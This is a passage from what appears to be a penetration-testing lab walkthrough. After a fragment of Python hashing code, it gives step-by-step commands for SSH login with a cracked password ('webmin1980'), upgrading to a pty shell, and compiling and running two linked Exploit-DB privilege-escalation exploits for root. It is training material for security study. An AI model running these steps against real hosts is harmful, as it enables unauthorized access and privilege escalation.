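    print("odm_user MD5 ->", lookup(ODM_MD5, CANDIDATES))
    _, d1 = salted_slow_hash("webmin1980")
    _, d2 = salted_slow_hash("webmin1980")
    print("same password, different salts, equal digests?", d1 == d2)  # False
```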
3937
3938ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
3939
3940
3941
3942---------------------------Type This-----------------------------------
3943ssh -l webmin 172.31.2.64
3944 webmin1980
3945
3946id
3947
3948cat /etc/*release
3949-----------------------------------------------------------------------
3950
3951
3952
3953....tired of not having a real command shell...
3954
3955
3956---------------------------Type This-----------------------------------
3957python -c 'import pty;pty.spawn("/bin/bash")'
3958
3959
3960cd /tmp
3961
3962pwd
3963
3964
3965cat >> exploit.c << out
3966
3967**************paste in the content from here *****************
3968https://www.exploit-db.com/raw/39166/
3969
3970
3971------ hit enter a few times ------
3972
3973------ then type 'out' ----- this closes the file handle...
3974
3975
3976
3977---------------------------Type This-----------------------------------
3978gcc -o boom exploit.c
3979
3980./boom
3981-----------------------------------------------------------------------
3982
3983
3984------------exploit failed, damn let's try another one ---------
3985
3986
3987
3988---------------------------Type This-----------------------------------
3989cat >> exploit2.c << out
3990
3991**************paste in the content from here *****************
3992https://www.exploit-db.com/raw/37292/
3993
3994
3995out
3996
3997
3998gcc -o boom2 exploit2.c
3999
4000./boom2
4001
4002id
4003
4004
4005......YEAH - do the happy dance!!!!
4006=============================================== Now back to the previous server ==============================================================